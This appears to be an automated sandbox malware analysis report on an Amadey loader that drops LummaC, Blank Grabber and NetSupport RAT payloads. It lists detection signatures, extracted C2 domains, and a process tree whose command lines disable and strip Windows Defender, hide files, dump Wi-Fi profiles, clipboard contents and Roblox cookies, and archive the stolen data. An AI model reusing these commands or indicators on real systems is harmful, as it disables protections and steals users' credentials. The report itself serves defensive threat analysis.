Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1578555
MD5:cd7686b11754d77b8722880a1a3a9a43
SHA1:ea1c00d2985812539452a31d8f75506573dad692
SHA256:a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944
Tags:exe, user-Bitsight

Detection

NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Amadeys stealer DLL
Yara detected Blank Grabber
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
PE file contains section with special chars
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 5784 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CD7686B11754D77B8722880A1A3A9A43)
    • skotes.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: CD7686B11754D77B8722880A1A3A9A43)
      • D1UL0FG.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" MD5: 63EFECD388A74A9CDEB79CD7C8020E7E)
        • D1UL0FG.exe (PID: 6716 cmdline: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" MD5: 63EFECD388A74A9CDEB79CD7C8020E7E)
          • cmd.exe (PID: 1536 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6396 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 2164 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5820 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
            • MpCmdRun.exe (PID: 6396 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
          • cmd.exe (PID: 1372 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 2128 cmdline: attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2704 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7344 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7316 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7452 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 8004 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7964 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7940 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 8020 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • systeminfo.exe (PID: 7948 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8092 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7500 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 5604 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7584 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • csc.exe (PID: 7784 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                • cvtres.exe (PID: 7728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 2672 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 1632 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 8152 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • getmac.exe (PID: 8072 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
          • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7996 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7836 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7976 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 3848 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 8000 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 6100 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 2704 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7380 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 5064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8060 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • rar.exe (PID: 3620 cmdline: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
          • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6772 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • 8ZVMneG.exe (PID: 7444 cmdline: "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 8ZVMneG.exe (PID: 8152 cmdline: "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
        • 8ZVMneG.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
      • m9sfEU9.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe" MD5: E5F8753995C0B30B827AA2B17F3E1D22)
        • FuturreApp.exe (PID: 1972 cmdline: "C:\Users\Public\Netstat\FuturreApp.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
        • Conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • d0ef52de9f.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
        • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • d0ef52de9f.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • d188864e84.exe (PID: 7360 cmdline: "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe" MD5: 25FB9C54265BBACC7A055174479F0B70)
  • skotes.exe (PID: 2128 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: CD7686B11754D77B8722880A1A3A9A43)
  • skotes.exe (PID: 8084 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: CD7686B11754D77B8722880A1A3A9A43)
  • cleanup
Malware family information (Malpedia)

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["awake-weaves.cyou", "immureprech.biz", "bellflamre.click", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "effecterectz.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author
C:\Users\Public\Netstat\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\Public\Netstat\FuturreApp.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\Public\Netstat\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\Public\Netstat\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\Public\Netstat\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
(7 further entries not included in this export)
Source | Rule | Description | Author
00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000005F.00000003.2934600615.0000000001328000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000002.00000003.2270058738.0000000004D90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000059.00000002.2787455438.0000000000691000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
(41 further entries not included in this export)
Source | Rule | Description | Author
85.2.FuturreApp.exe.920000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
85.2.FuturreApp.exe.6bfe0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
81.3.m9sfEU9.exe.31f4800.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
81.3.m9sfEU9.exe.31f4800.0.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
85.0.FuturreApp.exe.920000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
(10 further entries not included in this export)

System Summary

                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Netstat\FuturreApp.exe" , CommandLine: "C:\Users\Public\Netstat\FuturreApp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\FuturreApp.exe, NewProcessName: C:\Users\Public\Netstat\FuturreApp.exe, OriginalFileName: C:\Users\Public\Netstat\FuturreApp.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe, ParentProcessId: 7732, ParentProcessName: m9sfEU9.exe, ProcessCommandLine: "C:\Users\Public\Netstat\FuturreApp.exe" , ProcessId: 1972, ProcessName: FuturreApp.exe
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f8645e1e85.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ProcessId: 1536, ProcessName: cmd.exe
                                Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell 